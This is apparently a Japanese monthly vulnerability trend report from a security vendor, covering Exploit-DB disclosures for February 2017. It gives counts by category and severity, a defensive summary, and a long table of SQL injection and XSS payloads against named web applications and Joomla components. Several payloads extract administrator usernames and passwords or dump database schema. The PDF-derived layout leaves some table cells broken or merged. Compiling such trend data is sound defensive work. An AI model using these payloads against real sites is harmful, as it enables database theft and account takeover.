2017...JoomlaはWordpressと同じく、多くの...

2017.02

1. 脆弱性別件数脆弱性カテゴリ件数

クロスサイトスクリプティング (Cross Site Scripting : XSS) 2

SQL インジェクション (SQL Injection) 180

合計 182

2. 危険度別件数危険度件数割合

高 19 10.44%

中 163 89.56%

合計 182 100.00%

3. 攻撃実行の難易度別件数難易度件数割合

難 19 10.44%

中 26 14.29%

易 137 75.27%

合計 182 100.00%

4. 主なソフトウェア別脆弱性発生件数ソフトウェア名件数

Joomla 82

Itech B2B Script 5

Alstrasoft Video Share Enterprise 4

Viavi 4

Itech Movie Portal Script 4Itech Travel Portal Script 4

WordPress 3Visual Link Sharing Websites Builder Script 3

Easy Support Tools 3TI Online Examination System 3

Itech Job Portal Script 3Alstrasoft EPay Enterprise 3

ThisIsWhyImBroke Clone Script 2Quadz School Management System 2Domains & Hostings Manager PRO 2

Itech Multi Vendor Script 2Ultimate Viral Media Script 2

Zoneminder 2Automated Job Portal Script 2

Easy Web Search 2CMS Lite 1EXAMPLO 1

Itech Auction Script 1iScripts AutoHoster 1

Uploadr 1Viral Fun Facts Sharing Script 1

Takas Classified 1Property Listing Script 1PHP Marketplace Script 1

Itech Inventory Management Software 1Video Subscription 1

Itech News Portal Script 1LogoStore 1

Upworthy Clone Script 1Gram Post 1

Funny Image and Video Script 1Multilanguage Estate Agency Pro 1

Clone Script Directory Script 1Alstrasoft Forum Pay Per Post Exchange Script 1

Viral Pictures and Video Script 1Alstrasoft Template Seller Pro 1

NewsBee CMS 1HotelCMS with Booking Engine 1Web Inspiration Gallery Script 1

CodePaul ClipMass 1SlimarUSER Management 1

CLUB-8 EMS 1iScripts EasyCreate 1

QWIKIA 1Fully Featured News CMS 1

Tiger Post 1MySQL File Uploader 1

Youtube Analytics Multi Channel 1Muviko Video CMS 1

Zigaform 1Multi Outlets POS 1

Questions and Answers Script 1Mobiketa 1

Alstrasoft e-Friends 1Sendroid 1WhizBiz 1

Fome SMS Portal 1dotCMS 1

SOA School Management 1Client Expert 1

合計 182

EDB-Report最新Web脆弱性トレンドレポート(2017.02)

2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

サマリー

2017年2月に公開されたExploit-DBの脆弱報告件数は、１月に続き、他の期間の脆弱性数よりも4倍ほど多かったです。発見された脆弱性たちはほとんどSQLInjection関連の脆弱性でした。分析結果、攻撃の難易度は低くても攻撃の危

険度は高い攻撃が殆どでした。当該攻撃は、単純に攻撃が成功するかどうかを確認するクエリーから実際のDBデータを抽出するクエリーなど非常に様々な攻撃が行われました。脆弱性に露出されたソフトウェアを使用する管理者はSQL

Injection攻撃に露出されないよう入力値検証に対する大々的なセキュアコーディングが必要です。主要ソフトウェアに対する脆弱性発生の現況ではJoomlaCMSで最も多くの脆弱性が発見されました。 JoomlaはWordpressと同じく、多くの

ユーザが使用するCMSです。Joomlaを使用する管理者は対象プログラムおよび対象環境を必ず確認して該当プラグインに対するアップデートが必ず必要です。

ペンタセキュリティシステムズ株式会社R&Dセンター　データセキュリティチーム

2

180

0

20

40

60

80

100

120

140

160

180

200

クロスサイトスクリプティング

(Cross Site Scripting : XSS)

SQL インジェクション

(SQL Injection)

脆弱性別件数

19

163

険度別件数

高

中

19

26

137

攻撃実行の難易度別件数

難

中

易

82

544443

33

33

32

2

2

22

22

2

11

11

111

1 1 1

1 1

1

1

1

11

11

1

1

1

1

1

1

11

1

1

1

1

1

1

1

1

1

1

1

1

1

1 1

11

1

主なソフトウェア別脆弱性発生件数

Joomla

Itech B2B Script

Alstrasoft Video Share Enterprise

Viavi

Itech Movie Portal Script

Itech Travel Portal Script

WordPress

Visual Link Sharing Websites Builder Script

Easy Support Tools

日付 EDB番号脆弱性カテゴリ攻撃難脆弱性度危険度脆弱性名攻撃コード対象プログラム対象環境

2017-02-01 41210 SQL Injection 中中LogoStore - search.php SQL

Injection 脆弱性

POST /LogoStore/search.php HTTP/1.1

Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64

AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75

Safari/535.7

Accept: */*

Content-Type: application/x-www-form-urlencoded;

charset=UTF-8

query=test' UNION ALL SELECT

CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjj

jASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,

NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=

LogoStore LogoStore

2017-02-02 41230 SQL Injection 易中Itech Movie Portal Script 7.37 -

cms.php SQL Injection 脆弱性/cms.php?id=1%20and%201=1--

Itech Movie

Portal Script

Itech Movie

Portal Script

7.37

2017-02-02 41230 SQL Injection 易中

Itech Movie Portal Script 7.37 -

show_news.php SQL Injection 脆

弱性

/show_news.php?fid=1%20and%201=1--Itech Movie

Portal Script

Itech Movie

Portal Script

7.37



show_misc_video.php SQL

Injection 脆弱性

/show_misc_video.php?fid=1%20and%201=1--Itech Movie

Portal Script

Itech Movie

Portal Script

7.37


Itech Travel Portal Script 9.35 -

content.php SQL Injection 脆弱

性

/content.php?id=1%20and%201=1--Itech Travel

Portal Script

Itech Travel

Portal Script

9.35



faq_show.php SQL Injection 脆

弱性

/faq_show.php?fid=1%20and%201=1--Itech Travel

Portal Script

Itech Travel

Portal Script

9.35



showCity.php SQL Injection 脆弱

性

showCity.php?q=1%20and%201=1--Itech Travel

Portal Script

Itech Travel

Portal Script

9.35

2017-02-02 41231 SQL Injection 易中Itech Travel Portal Script 9.35 -

pages.php SQL Injection 脆弱性/pages.php?id=1%20and%201=1--

Itech Travel

Portal Script

Itech Travel

Portal Script

9.35


Property Listing Script -

property_view.php SQL Injection

脆弱性

/property_view.php?propid=443' AND SLEEP(5) AND

'FBop'='FBop

Property

Listing Script

Property

Listing Script


Itech Inventory Management

Software 3.77 - notice-edit.php

SQL Injection 脆弱性

/notice-edit.php?aid=1%20and%201=1--

Itech

Inventory

Management

Software

Itech

Inventory

Management

Software 3.77



faq_show.php SQL Injection 脆

弱性

/faq_show.php?fid=1%20and%201=1--Itech Movie

Portal Script

Itech Movie

Portal Script

7.37


Itech News Portal Script 6.28 -

subcategory.php SQL Injection

脆弱性

/subcategory.php?sc=1%20and%201=1--Itech News

Portal Script

Itech News

Portal Script

6.28


Itech Auction Script 6.49 -

list_photo.php SQL Injection 脆

弱性

/ajax-files/list_photo.php?pid=1%20and%201=1--Itech Auction

Script

Itech Auction

Script 6.49

2017-02-03 41239 SQL Injection 中中Zoneminder 1.29 / 1.30 -

index.php SQL Injection 脆弱性

POST /index.php HTTP/1.1

Host:



Safari/535.7

Accept: */*


charset=UTF-8

view=request&request=log&task=query&limit=100;(SELEC

T * FROM

(SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434

ZoneminderZoneminder

1.29 / 1.30


Itech Multi Vendor Script 6.49 -

product.php SQL Injection 脆弱

性

/product.php?id=id=9 AND 9693=9693Itech Multi

Vendor Script

Itech Multi

Vendor Script

6.49

2017-02-03 41235 SQL Injection 易中SlimarUSER Management 1.0 -

'id' Parameter SQL Injection

/userman/inbox.php?p=view&id=7' AND 6275=6275 AND

'DFYF'='DFYF

SlimarUSER

Management

SlimarUSER

Management

1.0


Itech Multi Vendor Script 6.49 -

quickview.php SQL Injection 脆

弱性

/quickview.php?id=10%20and%209776=9776Itech Multi

Vendor Script

Itech Multi

Vendor Script

6.49

2017-02-03 41239 SQL Injection 中中Zoneminder 1.29 / 1.30 -

index.php XSS 脆弱性

/index.php?view=request&request=log&task=download&k

ey=a9fef1f4&format=texty9fke%27%3Chtml%3E%3Chead%

3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(1)%3C%2

fscript%3E%3C/body%3E%3C/html%3Eayn2h

ZoneminderZoneminder

1.29 / 1.30







iScripts EasyCreate 3.2 -

getsitedetails.php SQL Injection

脆弱性

/getsitedetails.php?action=editsite&siteid=1%20and%201=

1--

iScripts

EasyCreate

iScripts

EasyCreate 3.2

2017-02-04 41250 SQL Injection 中中

Itech Job Portal Script 9.13 -

news_details_us.php SQL

Injection 脆弱性

/news_details_us.php?nid=1' RLIKE (SELECT (CASE WHEN

(2796=2796) THEN 1 ELSE 0x28 END))-- WmMl

Itech Job

Portal Script

Itech Job

Portal Script

9.13



search_result_alluser.php XSS 脆

弱性

/search_result_alluser.php?function="><svg/onload=promp

t('CT-Zer0');>

Itech Job

Portal Script

Itech Job

Portal Script

9.13


Alstrasoft Video Share

Enterprise 4.72 - uprofile.php


/uprofile.php?UID=1%20and%201=1--

Alstrasoft

Video Share

Enterprise

Alstrasoft

Video Share

Enterprise

4.72



Enterprise 4.72 - gmembers.php


/gmembers.php?urlkey=1&gid=1%20and%201=1--

Alstrasoft

Video Share

Enterprise

Alstrasoft

Video Share

Enterprise

4.72



Enterprise 4.72 -

channel_detail.php SQL Injection

脆弱性

/channel_detail.php?chid=1%20and%201=1--

Alstrasoft

Video Share

Enterprise

Alstrasoft

Video Share

Enterprise

4.72


Alstrasoft EPay Enterprise 5.17 -

products.htm SQL Injection 脆弱

性

/members/products.htm?id=1%20and%201=1--

&action=update

Alstrasoft

EPay

Enterprise

Alstrasoft EPay

Enterprise

5.17



subscriptions.htm SQL Injection

脆弱性

/members/subscriptions.htm?id=1%20and%201=1--

&action=update

Alstrasoft

EPay

Enterprise

Alstrasoft EPay

Enterprise

5.17



userinfo.htm SQL Injection 脆弱

性

/members/userinfo.htm?id=1%20and%201=1--

Alstrasoft

EPay

Enterprise

Alstrasoft EPay

Enterprise

5.17

2017-02-04 41243 SQL Injection 易中Alstrasoft e-Friends 5.12 -


/index.php?mode=forums&act=viewcat&seid=1%20and%2

01=1--

Alstrasoft e-

Friends

Alstrasoft e-

Friends 5.12



Enterprise 4.72 - album.php SQL

Injection 脆弱性

/album.php?UID=1%20and%201=1--

Alstrasoft

Video Share

Enterprise

Alstrasoft

Video Share

Enterprise

4.72


Alstrasoft Forum Pay Per Post

Exchange Script 2.01 -


/index.php?menu=forum_catview&catid=1%20and%201=1-

-

Alstrasoft

Forum Pay

Per Post

Exchange

Script

Alstrasoft

Forum Pay Per

Post Exchange

Script 2.01

2017-02-04 41249 SQL Injection 難高

Alstrasoft Template Seller Pro

3.25e - buy.php SQL Injection

脆弱性

/buy.php?tempid=-

1+union+select+1,2,3,4,5,6,7,8+from/**/table+--+"

Alstrasoft

Template

Seller Pro

Alstrasoft

Template

Seller Pro

3.25e



career_advice_details.php SQL

Injection 脆弱性

/career_advice_details.php?cid=5%27%20AND%207504=75

04-- zpmu

Itech Job

Portal Script

Itech Job

Portal Script

9.13


iScripts AutoHoster 3.0 -

getsitedetails.php SQL Injection

脆弱性

/websitebuilder/getsitedetails.php?action=editsite&siteid=1

%20and%201=1--

iScripts

AutoHoster

iScripts

AutoHoster

3.0


Questions and Answers Script

2.0.0 - category.php SQL

Injection 脆弱性

/category.php?cid=-

9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,

0x3a,adminpassword),3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,a

dminuser,0x3a,adminpassword),14,15,16,17,18,19,20,21,23+

from+admin-- -

Questions and

Answers

Script

Questions and

Answers Script

2.0.0


Viral Fun Facts Sharing Script

1.1.0 - fact.php SQL Injection 脆

弱性

/fact.php?id=1%20and%201=1--

Viral Fun

Facts Sharing

Script

Viral Fun Facts

Sharing Script

1.1.0


Visual Link Sharing Websites

Builder Script 2.1.0 - cat.php

SQL Injection 脆弱性 #

/cat.php?id=-

9999+/*!50000union*/+select+1,2,3,4,concat_ws(0x3a,admi

nuser,0x3a,adminpassword),6,7,8,9,10,11,12,13,14,15+from+

admin--

Visual Link

Sharing

Websites

Builder Script

Visual Link

Sharing

Websites

Builder Script

2.1.0



Builder Script 2.1.0 -

user_posts.php SQL Injection 脆

弱性

/user_posts.php?id=-



admin--

Visual Link

Sharing

Websites

Builder Script

Visual Link

Sharing

Websites

Builder Script

2.1.0


Ultimate Viral Media Script 1.0 -

picture.php SQL Injection 脆弱性

#

/picture.php?id=9999+/*!50000union*/+select+1,concat_ws

(0x3a,adminuser,0x3a,adminpassword,0x3c62723e49485341

4e2053454e43414e3c62723e7777772e696873616e2e6e657

4),3,4,5,6,7,0x564552204159415249203a29,9,10,11,12,13,14,

15,16+from+admin--

Ultimate Viral

Media Script

Ultimate Viral

Media Script

1.0


ThisIsWhyImBroke Clone Script

4.0 - listing.php SQL Injection 脆

弱性

/listing.php?id=-

21+/*!50000union*/+select+1,version(),3,(Select+export_set

(5,@:=0,(select+count(*)from(information_schema.columns)

where@:=export_set(5,export_set(5,@,table_name,0x3c6c69

3e,2),column_name,0xa3a,2)),@,2)),5,6,7,8,9,10,11,12,14,15,1

6,17

ThisIsWhyImB

roke Clone

Script

ThisIsWhyImBr

oke Clone

Script 4.0




2017-02-06 41254 SQL Injection 中中Upworthy Clone Script 1.1.0 -

post.php SQL Injection 脆弱性

/post.php?id=-

267+/*!50000union*/+select+(Select+export_set(5,@:=0,(se

lect+count(*)from(information_schema.columns)where@:=e

xport_set(5,export_set(5,@,table_name,0x3c6c693e,2),colum

n_name,0xa3a,2)),@,2)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

Upworthy

Clone Script

Upworthy

Clone Script

1.1.0

2017-02-06 41255 SQL Injection 難高Ultimate Viral Media Script 1.0 -

video.php SQL Injection 脆弱性

/video.php?id=9999+/*!50000union*/+select+1,concat_ws(

0x3a,adminuser,0x3a,adminpassword,0x3c62723e49485341

4e2053454e43414e3c62723e7777772e696873616e2e6e657

4),3,4,5,6,7,0x564552204159415249203a29,9,10,11,12,13,14,

15,16+from+admin--

Ultimate Viral

Media Script

Ultimate Viral

Media Script

1.0



Builder Script 2.1.0 - profile.php


/profile.php?id=-



admin--

Visual Link

Sharing

Websites

Builder Script

Visual Link

Sharing

Websites

Builder Script

2.1.0


ThisIsWhyImBroke Clone Script

4.0.0 - listing.php SQL Injection

脆弱性

/listing.php?id=-

21+/*!50000union*/+select+1,version(),3,(Select+export_set

(5,@:=0,(select+count(*)from(information_schema.columns)

where@:=export_set(5,export_set(5,@,table_name,0x3c6c69

3e,2),column_name,0xa3a,2)),@,2)),5,6,7,8,9,10,11,12,14,15,1

6,17

ThisIsWhyImB

roke Clone

Script

ThisIsWhyImBr

oke Clone

Script 4.0.0


Funny Image and Video Script

2.0.0 - post.php SQL Injection

脆弱性

/post.php?id=-

9999+/*!50000union*/+select+concat_ws(0x3a,adminuser,0

x3a,adminpassword),2,3,4,5,6,7,8,9,10,11+from+admin--

Funny Image

and Video

Script

Funny Image

and Video

Script 2.0.0


Clone Script Directory Script

1.1.0 - cat.php SQL Injection 脆

弱性

/cat.php?cid=-

9999'+/*!50000union*/+select+1,concat_ws(0x3a,adminuser

,0x3a,adminpassword),3,4,0x494853414e2053454e43414e3c

62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12,13,1

4,15,16,17,18,19,20,21+from+admin-- -

Clone Script

Directory

Script

Clone Script

Directory

Script 1.1.0


Viral Pictures and Video Script

2.0.0 - picture.php SQL Injection

脆弱性

/picture.php?id=7-

9999+/*!50000union*/+select+1,2,concat_ws(0x3a,adminus

er,0x3a,adminpassword),4,5,6,7,8+from+admin-- -

Viral Pictures

and Video

Script

Viral Pictures

and Video

Script 2.0.0

2017-02-06 41261 SQL Injection 難高NewsBee CMS - /newsbee/ SQL

Injection 脆弱性

/newsbee/30' AND (SELECT 4020 FROM(SELECT

COUNT(*),CONCAT(0x717a767a71,(SELECT

(ELT(4020=4020,1))),0x7170707171,FLOOR(RAND(0)*2))x

FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

AND

'Tdxc'='Tdxc_news_thai_soccer_targets_asia_wide_goals.html

NewsBee CMS NewsBee CMS


Web Inspiration Gallery Script

1.0.0 - site.php SQL Injection 脆

弱性

/site.php?id=-

9999+/*!50000union*/+select+concat_ws(0x3a,username,0x

3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,

21,22,23,24+from+administrator--

Web

Inspiration

Gallery Script

Web

Inspiration

Gallery Script

1.0.0

2017-02-07 41269 SQL Injection 中中Easy Web Search 3 - all.php


/all.php?q=&stt=99999'+Procedure+Analyse+(extractvalue(

0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@vers

ion)),0)-- -

Easy Web

Search

Easy Web

Search 3


Easy Support Tools 1.0 -

support.php SQL Injection 脆弱

性

/support.php?stt=1+Procedure+Analyse+(extractvalue(0,co

ncat(0x27,0x496873616e2053656e63616e,0x3a,@@version)

),0)-- -

Easy Support

Tools

Easy Support

Tools 1.0

2017-02-07 41268 SQL Injection 中中Easy Support Tools 1.0 -

blog.php SQL Injection 脆弱性

/blog.php?stt=1+Procedure+Analyse+(extractvalue(0,conca

t(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)

-- -

Easy Support

Tools

Easy Support

Tools 1.0

2017-02-07 41266 SQL Injection 中中Fully Featured News CMS 1.0 -

video.php SQL Injection 脆弱性

/video.php?id=-

9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,

0x3c62723e,pw),3,4,5,6,7+from+admin-- -

Fully Featured

News CMS

Fully Featured

News CMS 1.0


MySQL File Uploader 1.0 -

download.php SQL Injection 脆

弱性

/download.php?id=-

9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,

0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files

MySQL File

Uploader

MySQL File

Uploader 1.0

2017-02-07 41268 SQL Injection 中中Easy Support Tools 1.0 -

faq.php SQL Injection 脆弱性

/faq.php?stt=1+Procedure+Analyse+(extractvalue(0,concat(

0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--

-

Easy Support

Tools

Easy Support

Tools 1.0

2017-02-07 41269 SQL Injection 中中Easy Web Search 3 - go.php


/go.php?id=99999'+Procedure+Analyse+(extractvalue(0,co

ncat(0x27,0x496873616e2053656e63616e,0x3a,@@version)

),0)-- -

Easy Web

Search

Easy Web

Search 3




2017-02-08 41279 SQL Injection 中中Muviko Video CMS - search.php


/search.php?q=-

9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,em

ail,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,

11,12,13,14,15+from+users-- -

Muviko Video

CMS

Muviko Video

CMS

2017-02-08 41280 SQL Injection 易中Multi Outlets POS 3.1 - / SQL

Injection 脆弱性/view_invoice?id=1%20and%201=1--

Multi Outlets

POS

Multi Outlets

POS 3.1

2017-02-09 41283 SQL Injection 易中Mobiketa 3.5 - index.php SQL

Injection 脆弱性/index.php?url=myCampaign&view=1%20and%201=1-- Mobiketa Mobiketa 3.5

2017-02-09 41284 SQL Injection 易中 Sendroid 5.2 - SQL Injection /Compose.php?msgID=1%20and%201=1-- Sendroid Sendroid 5.2


Fome SMS Portal 2.0 -

Compose.php SQL Injection 脆

弱性

/Compose.php?draftID=1%20and%201=1--Fome SMS

Portal

Fome SMS

Portal 2.0


SOA School Management -

Document.php SQL Injection 脆

弱性

/Document.php?view=1%20and%201=1--SOA School

Management

SOA School

Management

2017-02-09 41287 SQL Injection 易中Client Expert 1.0.1 - index.php

SQL Injection 脆弱性/index.php?view=ViewInvoice&id=1%20and%201=1-- Client Expert

Client Expert

1.0.1

2017-02-09 41288 SQL Injection 易中EXAMPLO - index.php SQL

Injection 脆弱性

/index.php?page=exams&action=edit&eid=1%20and%201

=1--EXAMPLO EXAMPLO

2017-02-10 41307 SQL Injection 易中HotelCMS with Booking Engine

- / SQL Injection 脆弱性/locale?locale=1%20and%201=1--

HotelCMS

with Booking

Engine

HotelCMS

with Booking

Engine

2017-02-10 41306 SQL Injection 易中Video Subscription - / SQL

Injection 脆弱性/search?keyword=1%20and%201=1--

Video

Subscription

Video

Subscription

2017-02-10 41305 SQL Injection 易中CodePaul ClipMass - / SQL

Injection 脆弱性/search?keyword=1%20and%201=1--

CodePaul

ClipMass

CodePaul

ClipMass

2017-02-10 41304 SQL Injection 易中 Uploadr - / SQL Injection 脆弱性 /search?keyword=1%20and%201=1-- Uploadr Uploadr

2017-02-10 41303 SQL Injection 難高CLUB-8 EMS - editwatch.php


/editwatch.php?id=-

999'+/*!50000union*/+select+group_concat(username,char

(58),password),0x496873616e2053656e63616e,0x7777772e

696873616e2e6e6574,4,5,6,7,8,9,10,11,12,13,14+from+user

s-- -

CLUB-8 EMS CLUB-8 EMS


Automated Job Portal Script -

jobdetail.php SQL Injection 脆弱

性

/jobdetail.php?id=999'+union+all+select+1,2,3,4,concat_ws(

0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,

0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e636

16e202d207777772e696873616e2e6e6574,13,14,15,16,17,1

8,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -

Automated

Job Portal

Script

Automated

Job Portal

Script

2017-02-10 41302 SQL Injection 難高Automated Job Portal Script -

search.php SQL Injection 脆弱性

/search.php?keyword=1&location=999'+union+all+select+

1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c

62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873

616e2053656e63616e202d207777772e696873616e2e6e65

74,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28

+from+admin-- -

Automated

Job Portal

Script

Automated

Job Portal

Script

2017-02-10 41301 SQL Injection 易中QWIKIA 1.1.1 / SQL Injection 脆

弱性/search?q=1%20and%201=1-- QWIKIA QWIKIA 1.1.1

2017-02-10 41290 SQL Injection 易中CMS Lite 1.3.1 - / SQL Injection

脆弱性/?Style=1%20and%201=1-- CMS Lite CMS Lite 1.3.1


Tiger Post 3.0.1 -

/index.php/user_management/


/index.php/user_management/update?id=999'+/*!50000uni

on*/+select+1,2,3,4,group_concat(email,char(58),password),

0x496873616e2053656e63616e,7,8,9,10,11,12+from+user_

management-- -

Tiger PostTiger Post

3.0.1

2017-02-10 41292 SQL Injection 易中 Gram Post 1.0 - SQL Injection

/index.php/instagram_accounts/update?id=9999'+/*!50000

union*/+select+group_concat(email,char(58),password),2,3,

4,5,6+from+user_management-- -Gram Post Gram Post 1.0

2017-02-10 41293 SQL Injection 易中Youtube Analytics Multi Channel

3.0 - SQL Injection

/index.php/user_management/update?id=1%20and%201=1

--

Youtube

Analytics

Multi Channel

Youtube

Analytics Multi

Channel 3.0

2017-02-10 41295 SQL Injection 易中Takas Classified 1.1 - SQL

Injection 脆弱性

/index.php/classified_ads/ads/?&subcatid=1%20and%201=

1--

Takas

Classified

Takas

Classified 1.1


Zigaform -

/formbuilder/frontend/viewform

/ SQL Injection 脆弱性

/formbuilder/frontend/viewform/?form=1%20and%201=1-- Zigaform Zigaform


Multilanguage Estate Agency

Pro 1.2 - property_show.php


/property_show.php?id=1%20and%201=1--

Multilanguage

Estate Agency

Pro

Multilanguage

Estate Agency

Pro 1.2


Joomla! Component Soccer Bet

4.1.5 - index.php SQL Injection

脆弱性

/index.php?option=com_soccerbet&view=matches&cat=1

%20and%201=1--Joomla

Joomla!

Component

Soccer Bet

4.1.5


Joomla! Component Vik

Booking 1.7 - index.php SQL

Injection 脆弱性

/index.php?option=com_vikbooking&view=availability&roo

m_ids[0]=1%20and%201=1--Joomla

Joomla!

Component

Vik Booking

1.7





Joomla! Component Sponsor

Wall 7.0 - index.php SQL

Injection 脆弱性

/index.php?option=com_sponsorwall&task=click&wallid=1


Joomla!

Component

Sponsor Wall

7.0


Joomla! Component onisMusic

2 - index.php SQL Injection 脆弱

性

/index.php?option=com_onismusic&view=songs&tag=1%2

0and%201=1--Joomla

Joomla!

Component

onisMusic 2


Joomla! Component onisQuotes

2.5 - index.php SQL Injection 脆

弱性

/index.php?option=com_onisquotes&view=quotes&tag=1

%20and%201=1--&Itemid=180Joomla

Joomla!

Component

onisQuotes

2.5


Joomla! Component

onisPetitions 2.5 - index.php


/index.php?option=com_onispetitions&view=petitions&tag

=1%20and%201=1--Joomla

Joomla!

Component

onisPetitions

2.5


Itech B2B Script 4.29 -

/search.php SQL Injection 脆弱

性

/search.php?keywords=') UNION ALL SELECT

NULL,CONCAT(0x7171717671,0x5055787a7374645446494e

58566e66484f74555968674d504262564348434b70657a4c4

5556b534e,0x716a626271)#

Itech B2B

Script

Itech B2B

Script 4.29



/catcompany.php SQL Injection

脆弱性

/catcompany.php?token=') UNION ALL SELECT

NULL,CONCAT(0x7171717671,0x5055787a7374645446494e

58566e66484f74555968674d504262564348434b70657a4c4

5556b534e,0x716a626271)#

Itech B2B

Script

Itech B2B

Script 4.29



/buyleads-details.php SQL

Injection 脆弱性

/buyleads-details.php?id=') UNION ALL SELECT

NULL,CONCAT(0x7171717671,0x5055787a7374645446494e

58566e66484f74555968674d504262564348434b70657a4c4

5556b534e,0x716a626271)#

Itech B2B

Script

Itech B2B

Script 4.29

2017-02-12 41359 XSS 易中Itech B2B Script 4.29 -

/sendMessage.php XSS 脆弱性

POST /ajax-file/sendMessage.php HTTP/1.1

Host:



Safari/535.7

Accept: */*


charset=UTF-8

msg_message=<img src=i onerror=prompt(1)>

Itech B2B

Script

Itech B2B

Script 4.29

2017-02-12 41359 XSS 易中Itech B2B Script 4.29 - my-

contactdetails.php XSS 脆弱性

POST /my-contactdetails.php HTTP/1.1

Host:



Safari/535.7

Accept: */*


charset=UTF-8

fname=<img src=i onerror=prompt(1)>

Itech B2B

Script

Itech B2B

Script 4.29


Domains & Hostings Manager

PRO 3.0 - edit.php SQL Injection

脆弱性

/edit.php?entries=1%20and%201=1--

Domains &

Hostings

Manager PRO

Domains &

Hostings

Manager PRO

3.0


Quadz School Management

System 3.1 -

/index.php/suggestion/ SQL

Injection 脆弱性 #

/index.php/suggestion/own_suggestion?uisd=1%20and%20

1=1--

Quadz School

Management

System

Quadz School

Management

System 3.1

2017-02-12 41315 SQL Injection 易中Viavi Real Estate -

buysalerent.php SQL Injection/buysalerent.php?sort=1%20and%201=1-- Viavi

Viavi Real

Estate


TI Online Examination System

2.0 - student_edit.php SQL

Injection 脆弱性

/center/student_edit.php?s_id=1%20and%201=1--

TI Online

Examination

System

TI Online

Examination

System 2.0



2.0 - edit_notice.php SQL

Injection 脆弱性

/center/edit_notice.php?n_id=1%20and%201=1--

TI Online

Examination

System

TI Online

Examination

System 2.0


Joomla! Component Soccer Bet


脆弱性

/index.php?option=com_soccerbet&view=userbethistory&u

serid=1%20and%201=1--Joomla

Joomla!

Component

Soccer Bet

4.1.5


WhizBiz 1.9 -

/index.php/en/results/ SQL

Injection 脆弱性

/index.php/en/results/plainkey=1%20and%201=1-- WhizBiz WhizBiz 1.9



2.0 - exam_edit.php SQL

Injection 脆弱性

/center/exam_edit.php?p_e_id=1%20and%201=1--

TI Online

Examination

System

TI Online

Examination

System 2.0

2017-02-12 41315 SQL Injection 易中Viavi Real Estate - property-

detail.php SQL Injection 脆弱性/property-detail.php?pid=1%20and%201=1-- Viavi

Viavi Real

Estate

2017-02-12 41316 SQL Injection 易中Viavi Movie Review - 'id'

Parameter SQL Injection/genres.php?id=1%20and%201=1-- Viavi

Viavi Movie

Review





Viavi Product Review -

category.php SQL Injection 脆弱

性

/category.php?id=1%20and%201=1-- ViaviViavi Product

Review


Quadz School Management

System 3.1 - /index.php/sclass/


/index.php/sclass/ownClassRoutin?uisd=1%20and%201=1--

Quadz School

Management

System

Quadz School

Management

System 3.1


Domains & Hostings Manager

PRO 3.0 - list.php SQL Injection

脆弱性

/list.php?entries=1%20and%201=1--

Domains &

Hostings

Manager PRO

Domains &

Hostings

Manager PRO

3.0


Joomla! Component JE

Messanger - index.php SQL

Injection 脆弱性

/index.php?option=com_jemessenger&view=box_detail&fol

der=Inbox&task=edit&Itemid=1496&cid[0]=1%20and%201

=1--

Joomla

Joomla!

Component JE

Messanger


Joomla! Component JE Ticket

System 1.2 - index.php SQL

Injection 脆弱性

/index.php?option=com_jeticket&view=assign_detail&cid[0]


Joomla!

Component JE

Ticket System

1.2


Joomla! Component JE Portfolio

Creator 1.2 - index.php SQL

Injection 脆弱性

/index.php?option=com_jeportfolio&view=item_detail&d_it

emid=1%20and%201=1--Joomla

Joomla!

Component JE

Portfolio

Creator 1.2


Joomla! Component JE Form

Creator 1.8 - index.php SQL

Injection 脆弱性

/index.php?option=com_jeformcr&view=form&Itemid=1%2

0and%201=1--Joomla

Joomla!

Component JE

Form Creator

1.8


Joomla! Component JE K2

Multiple Form Story 1.3 -


/index.php?option=com_jek2storymultipleform&view=jesub

mit&Itemid=1%20and%201=1--Joomla

Joomla!

Component JE

K2 Multiple

Form Story 1.3


Joomla! Component JE Grid

Folio - index.php SQL Injection

脆弱性

/index.php?option=com_jegridfolio&view=category_detail&

id=1%20and%201=1--Joomla

Joomla!

Component JE

Grid Folio


Joomla! Component JE Quiz 2.3

- index.php SQL Injection 脆弱

性

/index.php?option=com_jequizmanagement&view=questio

n&eid=1%20and%201=1--Joomla

Joomla!

Component JE

Quiz 2.3


Joomla! Component Hbooking


脆弱性

/index.php?option=com_hbooking&view=roomlisting&tem

p=hotel&h_id=1%20and%201=1--Joomla

Joomla!

Component

Hbooking

1.9.9


Joomla! Component JE Awd

Song 1.8 - /index.php SQL

Injection 脆弱性

/index.php?option=com_jeawdsong&view=song_detail&id=

1%20and%201=1--Joomla

Joomla!

Component JE

Awd Song 1.8


Joomla! Component JE Auto 1.5


性

/index.php?option=com_jeauto&view=item_detail&d_itemi

d=1%20and%201=1--Joomla

Joomla!

Component JE

Auto 1.5


Joomla! Component JE auction


弱性

/index.php?option=com_jeauction&view=event_detail&eid


Joomla!

Component JE

auction 1.6


Joomla! Component JE Video

Rate 1.0 - index.php SQL

Injection 脆弱性

/index.php?option=com_jevideorate&view=video&cat_id=1


Joomla!

